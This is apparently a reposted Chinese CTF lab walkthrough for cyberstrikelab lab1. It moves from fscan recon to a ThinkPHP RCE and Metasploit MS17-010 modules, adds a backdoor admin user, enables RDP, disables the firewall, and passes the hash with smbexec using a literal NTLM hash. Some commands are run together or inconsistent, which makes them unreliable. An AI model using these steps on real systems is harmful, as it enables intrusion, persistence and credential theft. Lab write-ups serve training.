信息收集
先来看看fscan的扫描记录
发现有thinkphp。
thinkphp 5.0.23
直接getshell。拿到一个flag
内网渗透
上传fscan扫扫内网,还有代理。
192.168.20.10:135 open192.168.20.30:88 open192.168.20.10:3306 open192.168.20.30:445 open192.168.20.20:445 open192.168.20.10:445 open192.168.20.30:139 open192.168.20.20:139 open192.168.20.10:139 open192.168.20.30:135 open192.168.20.20:135 open192.168.20.10:80 open[*] NetBios 192.168.20.10 WORKGROUPWIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600[*] NetInfo [*]192.168.20.20 [->]cyberweb [->]192.168.20.20[+] MS17-010 192.168.20.30 (Windows Server 2008 R2 Standard 7600)[*] NetInfo [*]192.168.20.30 [->]WIN-7NRTJO59O7N [->]192.168.20.30[+] MS17-010 192.168.20.20 (Windows Server 2012 R2 Standard 9600)[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600[*] WebTitle [http://192.168.20.10](http://192.168.20.10/) code:200 len:25229 title:易优CMS - Powered by Eyoucms.com[+] PocScan [http://192.168.20.10](http://192.168.20.10/) poc-yaml-thinkphp5023-method-rce poc1可以看到内网有一个cms,还有一个ms17010,咱们把代理搭起来看看
ms17_010
拿msf打一下试试
proxychains4 msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 exploit拿不到shell,那就换一个打法,去执行命令试试
use admin/smb/ms17_010_commandset rhosts 192.168.20.30set command type c:\flag.txt可以直接获取flag。给他开个3389然后连接上去dump下hash,在这之前先添加个后门用户
set command net user ocean admin@123 /addset COMMAND net localgroup Administrators ocean /addset COMMAND 'REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'set COMMAND netsh firewall set opmode disable这里我登录不上不知道为什么,后来查资料和看别的博客才知道,登录域控要在用户名前加上.
也算是登录上了,抓一下hash,打个pth直接就完事了,但是没有抓到域管的hash,。所以需要提权去拿hash
proxychains4 python3 smbexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/[email protected] 拿到shell直接读取flag即可
原文始发于微信公众号(0xh4ck3r):cyberstrikelab通关记录-lab1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论